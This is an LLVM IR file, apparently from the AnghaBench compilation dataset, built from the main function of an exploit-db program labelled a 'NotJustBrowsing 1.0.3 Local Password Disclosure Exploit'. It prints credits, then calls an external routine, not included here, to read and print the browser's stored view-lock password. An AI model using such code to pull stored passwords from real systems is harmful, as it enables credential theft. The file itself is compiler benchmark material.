; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_966.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_966.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [66 x i8] c"NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan\0A\00", align 1
@.str.1 = private unnamed_addr constant [19 x i8] c"Credits to ATmaCA\0A\00", align 1
@.str.2 = private unnamed_addr constant [46 x i8] c"www.netmagister.com - www.spyinstructors.com\0A\00", align 1
@.str.3 = private unnamed_addr constant [24 x i8] c"kozan@netmagister.com\0A\0A\00", align 1
@.str.4 = private unnamed_addr constant [19 x i8] c"An error occured!\0A\00", align 1
@.str.5 = private unnamed_addr constant [13 x i8] c"NOTINSTALLED\00", align 1
@.str.6 = private unnamed_addr constant [56 x i8] c"NotJustBrowsing 1.0.3 is not installed on your system!\0A\00", align 1
@.str.7 = private unnamed_addr constant [23 x i8] c"View Lock Password: %s\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %2 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([66 x i8], [66 x i8]* @.str, i64 0, i64 0))
  %3 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.1, i64 0, i64 0))
  %4 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([46 x i8], [46 x i8]* @.str.2, i64 0, i64 0))
  %5 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([24 x i8], [24 x i8]* @.str.3, i64 0, i64 0))
  %6 = call i8* @bilgi_oku(i32 4, i32 3)
  %7 = icmp eq i8* %6, null
  br i1 %7, label %8, label %10

8:                                                ; preds = %0
  %9 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.4, i64 0, i64 0))
  store i32 -1, i32* %1, align 4
  br label %18

10:                                               ; preds = %0
  %11 = call i8* @bilgi_oku(i32 4, i32 3)
  %12 = icmp eq i8* %11, getelementptr inbounds ([13 x i8], [13 x i8]* @.str.5, i64 0, i64 0)
  br i1 %12, label %13, label %15

13:                                               ; preds = %10
  %14 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([56 x i8], [56 x i8]* @.str.6, i64 0, i64 0))
  store i32 -1, i32* %1, align 4
  br label %18

15:                                               ; preds = %10
  %16 = call i8* @bilgi_oku(i32 4, i32 3)
  %17 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([23 x i8], [23 x i8]* @.str.7, i64 0, i64 0), i8* %16)
  store i32 0, i32* %1, align 4
  br label %18

18:                                               ; preds = %15, %13, %8
  %19 = load i32, i32* %1, align 4
  ret i32 %19
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i8* @bilgi_oku(i32, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
